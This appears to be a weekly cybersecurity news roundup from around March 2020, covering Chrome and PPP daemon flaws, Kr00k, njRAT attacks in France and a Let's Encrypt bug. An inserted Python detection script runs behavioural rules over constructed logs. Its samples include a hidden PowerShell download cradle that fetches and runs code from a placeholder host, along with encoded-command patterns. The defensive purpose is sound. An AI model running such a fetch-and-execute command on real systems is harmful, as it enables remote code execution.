This week had all the juicy cyber news stories that we could ask for: from high-severity vulnerability patches and SCADA system attacks to CIA espionage. Let's take a look at what happened in more detail.
1. Google Chrome Bugs
Google has released a new critical software update for its Chrome browser that includes fixes for several high-severity vulnerabilities. One of these vulnerabilities could, if exploited, allow attackers to execute arbitrary code on a target system, while the other bugs can potentially allow a remote attacker to exploit a heap corruption vulnerability using specially crafted HTML. We highly recommend that all users of the Google Chrome browser download and install the latest version of the software.
2. Wi-Fi Encryption Vulnerability Affects Billions of Devices
Another thing that got the cyber security community talking this past week was the discovery of the "Kr00k" vulnerability. This vulnerability resides in the widely used Wi-Fi chips manufactured by Broadcom and Cypress. It is a flaw that could let attackers within radio range intercept and decrypt some wireless network packets transmitted over the air by a vulnerable device. Something important to note is that the vulnerability does not reside in the Wi-Fi encryption protocols themselves but rather in the way the vulnerable chips implemented the encryption.
As cyber security professionals, we remind you that whenever a new vulnerability is disclosed, keeping your equipment up to date is the best way to maintain the integrity, availability and confidentiality of your data.
3. French Critical Infrastructure Attack
As reported by KrebsOnSecurity, a large number of critical infrastructure firms in France were hacked as part of a large-scale campaign launched by Morocco-based hackers. The attackers used a malware known as njRAT or Bladabindi. It affected multiple targets, including a national power company, an automobile manufacturer, a major bank, companies that cooperate with the French postal and transportation systems, a domestic firm that operates several airports, a state-owned railway company and multiple nuclear facilities.
Even though this attack was only beaconing data to a foreign location and not doing anything that would cause damage, SCADA attacks should always be a reminder of the dangers that might come. We hope this serves as motivation for governments to invest in cyber security and harden their critical infrastructures as much as they possibly can.
4. CIA Behind an 11-Year-Long Hacking Attack Against China
Qihoo 360, a Chinese internet security company, has published a report accusing the U.S. Central Intelligence Agency of being behind an 11-year-long hacking campaign against Chinese aviation and energy sectors as well as government agencies and internet companies. According to Qihoo 360, there are similarities between previously known CIA attacks and the ones on Chinese infrastructure, which raised its suspicion. This is not the first time a hacking campaign has been linked to the CIA: Kaspersky and Symantec have also tracked the agency backing various hacking operations against other countries.
5. Let's Encrypt Vulnerability
A bug was found in one of the most widely used digital certificate authorities on the internet, "Let's Encrypt". ISRG (Internet Security Research Group), the group behind Let's Encrypt and a significant part of the security infrastructure of the web, notified its subscribers that it had discovered a bug in its certificate authority code. The affected certificates needed to be renewed by Wednesday, March 4.
6. Malware-Free Attacks Dominate
As reported by CrowdStrike, malware-free attacks surpassed the volume of malware-based attacks in 2019. Much like in the old days, malware-free attacks bring back the hands-on-keyboard attacker and techniques such as command-line activity, PowerShell, and hiding files and directories. Experts worry that if this continues, security tools and targeted organisations will be overwhelmed and unable to counter them.
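Because malware-free intrusions leave no file to hash, detection has to key on behaviour instead. The following is an added example, not part of the original post or of CrowdStrike's report: a handful of assumed behavioural rules (the rule names, the pipe-delimited log format and every sample record are constructed for illustration, not taken from any real EDR product) run over process-creation log lines, flagging the kinds of hands-on-keyboard activity the post names, encoded or hidden-window PowerShell, download cradles, `attrib +h` on a staging directory and an Office application spawning a shell.

```python
"""Toy behavioural detection pass over constructed process-creation logs.

Assumed record format (constructed for this example, one record per line):
    timestamp|host|user|parent_image|command_line
"""
import re
from typing import Callable, Dict, List

# Constructed sample records: two look benign (notepad, a scheduled backup
# script), three carry the malware-free tradecraft described in the post.
SAMPLE_LOGS = [
    "2020-03-06T09:12:01Z|ws01|alice|explorer.exe|powershell.exe -NoProfile -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    "2020-03-06T09:12:07Z|ws01|alice|cmd.exe|attrib +h +s C:\\Users\\Public\\stage",
    "2020-03-06T09:15:33Z|ws02|bob|explorer.exe|notepad.exe C:\\Users\\bob\\notes.txt",
    "2020-03-06T09:16:40Z|ws02|bob|winword.exe|cmd.exe /c powershell -w hidden -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')\"",
    "2020-03-06T09:20:02Z|ws03|svc_backup|services.exe|powershell.exe -File C:\\Scripts\\backup.ps1",
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_IMAGE = re.compile(r"^(cmd|powershell|pwsh|wscript|cscript|mshta)(\.exe)?\b", re.I)


def _cmd_matches(pattern: str) -> Callable[[Dict[str, str]], bool]:
    """Build a predicate that searches the command line, case-insensitively."""
    rx = re.compile(pattern, re.I)
    return lambda rec: bool(rx.search(rec["cmd"]))


# Rule name -> predicate over a parsed record. Every rule describes a
# behaviour rather than a file signature; the names are this example's own.
RULES: Dict[str, Callable[[Dict[str, str]], bool]] = {
    # Base64-encoded PowerShell hides the script body from casual review.
    "encoded_powershell": _cmd_matches(r"powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b"),
    # A hidden window keeps an interactive operator's activity off-screen.
    "hidden_window_powershell": _cmd_matches(r"powershell(\.exe)?\b.*\s-w(indowstyle)?\s+hidden\b"),
    # Download cradles pull further tooling into memory without dropping a file.
    "download_cradle": _cmd_matches(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient"),
    # attrib +h marks a staging directory hidden, as the post notes.
    "attrib_hide": _cmd_matches(r"\battrib(\.exe)?\b.*\+h"),
    # Office applications rarely have a legitimate reason to spawn a shell.
    "office_spawns_shell": lambda rec: (
        rec["parent"].lower() in OFFICE_PARENTS and bool(SHELL_IMAGE.match(rec["cmd"]))
    ),
}


def parse_line(line: str) -> Dict[str, str]:
    """Split one record; maxsplit keeps any '|' inside the command line intact."""
    ts, host, user, parent, cmd = line.split("|", 4)
    return {"ts": ts, "host": host, "user": user, "parent": parent, "cmd": cmd}


def evaluate(rec: Dict[str, str]) -> List[str]:
    """Return the names of every rule the record trips, in definition order."""
    return [name for name, pred in RULES.items() if pred(rec)]


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run all rules over the log; emit one alert per record that trips anything."""
    alerts: List[Dict[str, object]] = []
    for line in lines:
        rec = parse_line(line)
        hits = evaluate(rec)
        if hits:
            alerts.append({"ts": rec["ts"], "host": rec["host"], "user": rec["user"],
                           "rules": hits, "cmd": rec["cmd"]})
    return alerts


def rule_counts(alerts: List[Dict[str, object]]) -> Dict[str, int]:
    """Tally how often each rule fired, useful for tuning noisy rules."""
    counts: Dict[str, int] = {}
    for alert in alerts:
        for name in alert["rules"]:
            counts[name] = counts.get(name, 0) + 1
    return counts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOGS):
        print(f"{a['ts']} {a['host']}/{a['user']} [{', '.join(a['rules'])}] {a['cmd'][:70]}")
```

The record from `winword.exe` trips three rules at once; stacking several weak behavioural signals on one process is usually what separates an operator at the keyboard from an administrator running a legitimate PowerShell script, which is why the backup job on ws03 raises nothing here.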
7. Critical PPP Daemon Flaw
The discovery of a 17-year-old remote code execution vulnerability affecting almost all Linux-based operating systems as well as other networking devices has caused panic in the cyber security community. This newly discovered vulnerability affects the PPP daemon software that enables communication and data transfer between nodes and is very widely used in DSL broadband connections and VPNs. Users with affected operating systems and devices need to apply security patches as soon as they become available.